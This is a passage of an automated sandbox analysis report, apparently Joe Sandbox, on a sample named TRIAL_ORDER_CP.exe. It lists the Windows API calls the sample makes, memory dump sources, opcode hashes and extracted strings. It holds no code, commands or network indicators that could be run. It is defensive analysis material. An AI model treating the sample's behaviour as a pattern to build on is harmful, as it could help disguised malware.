                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          • Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction ID: 551f93d59f6a57a7cc32b559d7ebc8a6d8da67cd5dc02587d5b4d2bd1ffdf244
                                          • Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
                                          • Instruction Fuzzy Hash: 95E08673504310AAD2105A705E04C2B73B89F85740302443EF942F2140D734DC32E769
                                          APIs
                                          • GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          • Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
                                          • Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
                                          • Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15
                                          APIs
                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403522,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00405B08
                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 00405B16
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction ID: 7bb2d1eb449126eed485e4eb4fbdbafbf981390ed288ef949080c13de55397a1
                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                          • Instruction Fuzzy Hash: 7CC08C30314902DADA802B209F0870B3A60AB80340F154439A582E00E4CA30A445C92D
                                          APIs
                                          • CreateFileA.KERNELBASE(00000000), ref: 70682C57
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: e603e0ad443e8a7163f5da705e1a2e29d83e6ca47d138ef42cf4fc0fc48c8a27
                                          • Instruction ID: e37beeb617979f6845ca62c39ed5e7d50ab066ac5c19d5842683936109436a8b
                                          • Opcode Fuzzy Hash: e603e0ad443e8a7163f5da705e1a2e29d83e6ca47d138ef42cf4fc0fc48c8a27
                                          • Instruction Fuzzy Hash: D841A572500206EFDB259F65DD7AB9D3B76FF44318F308426E805D61E4D638A880DB95
                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,004034E4,?,?,0040332B,?,00000004,00000000,00000000,00000000), ref: 004060DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction ID: 1a6ac9c2f17c3bf7024e7b579d6ce6ab3b84958f313ea5b4b1ce89539a84cc3a
                                          • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                          • Instruction Fuzzy Hash: 55E0EC3225026AABDF10DE55DC00EEB7BACEB053A0F018437F956E7150DA31E93197A8
                                          APIs
                                          • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,0040349A,?,00793700,?,00793700,?,?,00000004,00000000), ref: 0040610A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction ID: 280cd4c212b49affc14266408846aa3a30e7e9a640caac8a44b81d30c287abca
                                          • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                          • Instruction Fuzzy Hash: E1E08C3221025AABCF109E908C01EEB7B6CEB043A0F014433FD16EB051D230E8319BA8
                                          APIs
                                          • VirtualProtect.KERNELBASE(7068505C,00000004,00000040,7068504C), ref: 70682A9D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual
                                          • String ID:
                                          • API String ID: 544645111-0
                                          • Opcode ID: 4dbe51419831dbae71d01fb9c501e67474cd2b29947a61e474d1c00567023170
                                          • Instruction ID: 72f67b6a44391393fe7e3fa381fbdd2028a3ddfbde21cdff6ef66d3f41be2940
                                          • Opcode Fuzzy Hash: 4dbe51419831dbae71d01fb9c501e67474cd2b29947a61e474d1c00567023170
                                          • Instruction Fuzzy Hash: 26F0C9B2500380FEC360CF3A8C7C7093FE0B718304B35452AE288EA2E8E3744444DB92
                                          APIs
                                          • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040644F,?,?,?,?,Call,?,00000000), ref: 004063E5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction ID: e359b3f9d4e5954a9af9fcfc08987e0780d6658b6568ce36bf776d9a1ed3ba47
                                          • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                          • Instruction Fuzzy Hash: 5AD0123210020DBBDF115F90AD01FAB771DAB08310F014826FE17E40D0D775D530A7A4
                                          APIs
                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00404531
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                          • Instruction ID: 80e323bcaa4fb1d2d6ad7f8777a1edc32b6b0207238f0482179e9273dd0660e4
                                          • Opcode Fuzzy Hash: f1c7da54befd6d6a563f00396e813b8d921f3a4fa707ebac73e9c93964ba1fa7
                                          • Instruction Fuzzy Hash: 10C09BB57443007BDA149B509E45F17776467D4741F14C5797340F50F0C774E450D62C
                                          APIs
                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00403267,?), ref: 004034F5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                          • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                          • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                          APIs
                                          • SendMessageW.USER32(00000028,?,00000001,00404333), ref: 00404516
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          • Opcode ID: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction ID: c6ab7f6cffe81da1172822363f1dd48ca364d348eecf8336b79a6db78a7c4a26
                                          • Opcode Fuzzy Hash: d8acea26a230a6f6dce64032923e754adb325d86aa568b2d6d5b5dd5df397682
                                          • Instruction Fuzzy Hash: 18B09235184A00ABDA515B00DE09F467B62E7A4701F008538B240640F0CBB200A0DB0A
                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,004042CC), ref: 004044FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                          • Instruction ID: b0a400b6fcb01754b069d8f8c1c9044561b78d1e04efb9d0fff21555a903a89e
                                          • Opcode Fuzzy Hash: c966d15b9c294ca5f877954a8561fb6b5762177598d7c32600178bcf5d115e9d
                                          • Instruction Fuzzy Hash: DFA00176444910ABDA02AB50EF0984ABB62FBE5701B519879A286510348B365820FB19
                                          APIs
                                          • GlobalAlloc.KERNELBASE(00000040,?,706812DB,?,7068137F,00000019,706811CA,-000000A0), ref: 706812C5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270781877421.0000000070681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 70680000, based on PE: true
                                          • Associated: 00000000.00000002.270781797504.0000000070680000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270781951296.0000000070684000.00000002.00000001.01000000.0000000A.sdmp
                                          • Associated: 00000000.00000002.270782024135.0000000070686000.00000002.00000001.01000000.0000000A.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_70680000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: AllocGlobal
                                          • String ID:
                                          • API String ID: 3761449716-0
                                          • Opcode ID: a6533e629b3d8bc6ae3734a33eba8cf19bdd39af857c902e9fad0a8d6e557d76
                                          • Instruction ID: 9e5d3c42d63c48dee2d542e620e45d2981f3eb100991c105e26e8770901c2626
                                          • Opcode Fuzzy Hash: a6533e629b3d8bc6ae3734a33eba8cf19bdd39af857c902e9fad0a8d6e557d76
                                          • Instruction Fuzzy Hash: 6CB00272640200BFEF409F55DD5EF353694F740705F744050B705D51D5D56458548565
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406335,?,?), ref: 004061D5
                                          • GetShortPathNameW.KERNEL32(?,007A4DE8,00000400), ref: 004061DE
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FB9
                                            • Part of subcall function 00405FA9: lstrlenA.KERNEL32(?,?,00000000,0040628E,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEB
                                          • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 004061FB
                                          • wsprintfA.USER32 ref: 00406219
                                          • GetFileSize.KERNEL32(00000000,00000000,007A55E8,C0000000,00000004,007A55E8,?), ref: 00406254
                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406263
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 0040629B
                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,007A49E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F1
                                          • GlobalFree.KERNEL32(00000000), ref: 00406302
                                          • CloseHandle.KERNEL32(00000000), ref: 00406309
                                            • Part of subcall function 00406044: GetFileAttributesW.KERNELBASE(?,004030E2,C:\Users\user\Desktop\TRIAL_ORDER_CP.exe,80000000,00000003), ref: 00406048
                                            • Part of subcall function 00406044: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]$Mz$Uz
                                          • API String ID: 2171350718-3367237295
                                          • Opcode ID: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction ID: b6cadbeacbe634b6bd87c882f2c351c0ea44a21df7cd689b804f2f2a1cba60a5
                                          • Opcode Fuzzy Hash: a33c05bce7c125d61af8aa6c61577077044d65e406db0fd5498825754e73940b
                                          • Instruction Fuzzy Hash: 2F313770600715BBD2206B658D49F6B3A5CDF82714F16003EFE02F72D2DA7D982486BD
                                          APIs
                                          • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406865
                                          • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C), ref: 00406874
                                          • CharNextW.USER32(?,"C:\Users\user\Desktop\TRIAL_ORDER_CP.exe",75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 00406879
                                          • CharPrevW.USER32(?,?,75D23420,C:\Users\user\AppData\Local\Temp\,00000000,0040350A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403819,?,00000008,0000000A,0000000C), ref: 0040688C
                                          Strings
                                          • "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe", xrefs: 00406846
                                          • *?|<>/":, xrefs: 00406854
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00406803
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.270764585933.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.270764558864.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764615501.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007A5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270764643706.00000000007D1000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007D7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.00000000007E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000817000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000081B000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.0000000000829000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.270765171008.000000000082B000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
